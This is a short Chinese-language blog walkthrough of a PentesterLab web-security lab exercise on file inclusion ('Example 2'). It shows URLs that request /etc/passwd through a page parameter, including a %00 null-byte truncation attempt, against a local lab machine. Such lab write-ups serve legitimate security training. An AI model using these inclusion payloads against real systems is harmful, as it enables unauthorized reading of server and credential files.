PentestLab-web安全文件包含-EXP2-CFANZ编程社区

PentestLab-web安全文件包含-EXP2

上善若水山西太原

阅读 80

2023-03-28

我们打开靶机

选择文件包含页面，选择“Example 2”

PentestLab-web安全文件包含-EXP2_php

观察页面

PentestLab-web安全文件包含-EXP2_php_02

尝试更换page参数

http://192.168.29.148/fileincl/example2.php?page=/etc/passwd

结果如下

PentestLab-web安全文件包含-EXP2_文件包含_03

提示目前不存在

继续尝试，使用%00进行截断

http://192.168.29.148/fileincl/example2.php?page=/etc/passwd%00

结果如下

PentestLab-web安全文件包含-EXP2_后缀名_04

我们打开靶机

观察源码

PentestLab-web安全文件包含-EXP2_php_05

使用%00进行截断，并且添加后缀名称

相关推荐
老榆
 PentestLab-web安全文件上传测试-EXP2
老榆 53 0 0
八怪不姓丑
 PentestLab-web安全文件包含-EXP1
八怪不姓丑 59 0 0
孟佳
 PentestLab-web安全SQL注入-EXP2
孟佳 44 0 0
猫er聆听没落的旋律
 PentestLab-web安全目录穿越-EXP2
猫er聆听没落的旋律 58 0 0
辰鑫chenxin
 PentestLab-web安全命令注入-EXP2
辰鑫chenxin 49 0 0
前端王祖蓝
 PentestLab-web安全XML测试-EXP2
前端王祖蓝 36 0 0
钵仔糕的波波仔
 PentestLab-web安全LDAP测试-EXP2
钵仔糕的波波仔 50 0 0
玩物励志老乐
 PentestLab-web安全文件上传测试-EXP1
玩物励志老乐 62 0 0
酷子腿长一米八
 PentestLab-web安全SQL注入-EXP5
酷子腿长一米八 37 0 0
萧让听雪
 PentestLab-web安全命令注入-EXP1
萧让听雪 35 0 0

精彩评论（0）